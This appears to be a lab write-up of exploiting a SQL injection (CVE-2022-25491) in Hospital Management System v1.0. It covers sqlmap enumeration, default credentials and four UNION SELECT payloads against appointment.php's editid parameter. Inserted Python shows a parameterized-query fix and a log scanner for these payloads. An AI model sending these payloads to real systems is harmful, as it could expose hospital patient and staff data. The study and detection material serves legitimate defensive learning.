HMS v1.0 appointment.php editid parameter SQL injection vulnerability (CVE-2022-25491)
2022-07-04 05:43:00 【sec0nd_】
Preface
During the summer vacation I had nothing to do, so I tried a target machine.
It was on the vulfocus online platform, which I was using for the first time. I did not expect that the environment only lasts 15 min, and there is no write-up, so this reproduction is not complete. Let me talk through the process.
Vulnerability description
Hospital Management System (HMS) is a computer- or network-based system that helps manage the operations of a hospital or any medical institution. The system or software helps make the whole workflow paperless. It integrates all the information about patients, doctors, staff and hospital management details into one piece of software, covering the various professionals in the hospital.
HMS v1.0 was found to contain SQL injection vulnerabilities through adminlogin.php and patientlogin.php. admin/123456789
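The pattern behind both the login-page findings and the editid finding is a request parameter spliced directly into SQL text. The following Python is an added illustration, not code from HMS or from this write-up: it builds a small in-memory SQLite table (constructed here; the real HMS schema is not on the page) and shows the vulnerable string concatenation next to a parameterized version. SQLite uses `--` for comments where MySQL accepts the `#` that the page's `%23` payloads rely on, so the demonstration payload is adapted accordingly.

```python
import sqlite3

# Constructed in-memory schema standing in for the HMS "appointment" and "users"
# tables. Added illustration only; column names and data are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE appointment (id INTEGER, patient TEXT, doctor TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO appointment VALUES (?, ?, ?)",
                     [(1, "alice", "dr_bob"), (2, "carol", "dr_dan")])
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return conn

def fetch_appointment_unsafe(conn, editid):
    # Vulnerable pattern: the request parameter becomes part of the SQL text, so a
    # value containing a quote rewrites the query (the CVE-2022-25491 bug class).
    sql = "SELECT id, patient, doctor FROM appointment WHERE id='" + editid + "'"
    return conn.execute(sql).fetchall()

def fetch_appointment_safe(conn, editid):
    # Hardened pattern: validate the expected shape first, then bind the value as a
    # parameter so the database driver never interprets it as SQL.
    if not editid.isdigit():
        return []
    return conn.execute(
        "SELECT id, patient, doctor FROM appointment WHERE id=?", (int(editid),)
    ).fetchall()

# Same shape as the page's editid payload, with SQLite's "--" comment in place of "#".
PAYLOAD = "-1' UNION SELECT id, username, password FROM users -- "

def demo():
    """Run both query styles against a legitimate id and the injection payload."""
    conn = make_db()
    return {
        "unsafe_legit": fetch_appointment_unsafe(conn, "1"),
        "unsafe_payload": fetch_appointment_unsafe(conn, PAYLOAD),
        "safe_legit": fetch_appointment_safe(conn, "1"),
        "safe_payload": fetch_appointment_safe(conn, PAYLOAD),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The unsafe function returns the row from the `users` table for the payload, which is exactly how the UNION queries later in this write-up pull `user()`, `database()` and `information_schema` data through the appointment page; the parameterized function returns nothing for the same input.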
Reproduction process
Approach 1
I thought the admin and 123456789 in the description were the final result, i.e. what you need to obtain by injection.
So I just went straight to sqlmap.
On the login page there are two parameters.
Enter one at random and capture the request.
Because it is a POST request, you need to export the request packet; select the loginid parameter.
You can see that there are four databases.
Select the hms database and enumerate its tables.
Because it was too slow, but the target machine environment only lasts 15 min.
Here we see the user table, so select the user table directly.
Query the columns in the user table.
Here you can see that there are three fields.
Dump the values of these three fields.
At this point I found the password was wrong; it is not 123456789.
This approach was interrupted here.
Approach 2
This approach follows https://www.cnblogs.com/HOPEAMOR/p/16251404.html
Because the vulnerability is in the editid parameter of appointment.php, you need to log in first.
Find the appointment page.
Send the payloads:
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23# View current connected users
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,database()%23# View the currently connected database
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,version()%23# View the current database version
/appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23# Query all tables
Finally, time-based injection. Emm, I did not understand this part: there was no response, and I don't know which table to read.
Because I want to watch a show at the weekend,
this approach is also temporarily interrupted……
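From the defending side, the four requests above leave a distinctive trace in the web server's access log: a quote-terminated UNION SELECT, information_schema lookups and a comment token in a query-string parameter. The following Python is an added example, not part of this write-up or of HMS: it decodes each request's query parameters, normalizes them and flags the indicators drawn from the payloads above. The log lines are constructed here in Apache combined format, with made-up IPs, and the second and third reproduce the page's own editid payloads.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Indicators taken from the payloads in this write-up. Order matters only for the
# order in which labels are reported.
INDICATORS = [
    ("union_select", re.compile(r"union\s+(all\s+)?select")),
    ("schema_enum", re.compile(r"information_schema\.")),
    ("db_fingerprint", re.compile(r"\b(user|database|version)\s*\(\s*\)")),
    ("comment_terminator", re.compile(r"(#|--\s|/\*)")),
]

# Constructed sample log lines (Apache combined format, fictitious clients).
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jul/2022:05:43:00 +0000] "GET /appointment.php?editid=12 HTTP/1.1" 200 1203',
    '10.0.0.9 - - [04/Jul/2022:05:44:10 +0000] "GET /appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,user()%23 HTTP/1.1" 200 1311',
    '10.0.0.9 - - [04/Jul/2022:05:44:12 +0000] "GET /appointment.php?editid=-1%27union%20select%201,2,3,4,5,6,7,8,9,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())%23 HTTP/1.1" 200 1402',
    '10.0.0.7 - - [04/Jul/2022:05:45:00 +0000] "GET /appointment.php?editid=7&note=union%20of%20patients HTTP/1.1" 200 1190',
]

REQ_FIELD = re.compile(r'"([^"]*)"')

def normalize(value):
    # Decode until stable so double encoding (%2527 for a quote) does not hide the
    # payload, then lowercase and collapse whitespace into one canonical form.
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return re.sub(r"\s+", " ", value.lower())

def inspect_request(request_line):
    """Return (path, findings) for one 'METHOD /path?query HTTP/1.x' request field.

    findings is a list of (parameter_name, [indicator_labels]); a parameter is
    reported only when it carries a UNION SELECT or an information_schema reference,
    so plain words such as 'union' in free text do not raise an alert on their own.
    """
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else request_line
    url = urlsplit(target)
    findings = []
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        val = normalize(raw)
        hits = [label for label, rx in INDICATORS if rx.search(val)]
        if "union_select" in hits or "schema_enum" in hits:
            findings.append((name, hits))
    return url.path, findings

def scan_log(lines):
    """Return [(client_ip, path, parameter, hits)] for every flagged request."""
    alerts = []
    for line in lines:
        m = REQ_FIELD.search(line)
        if not m:
            continue
        path, findings = inspect_request(m.group(1))
        ip = line.split(" ", 1)[0]
        for param, hits in findings:
            alerts.append((ip, path, param, hits))
    return alerts

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Only the two requests from 10.0.0.9 are reported, each on the editid parameter; the legitimate `editid=12` request and the free-text `note=union of patients` parameter pass through, which is why the rule keys on `union ... select` and `information_schema` rather than on single words.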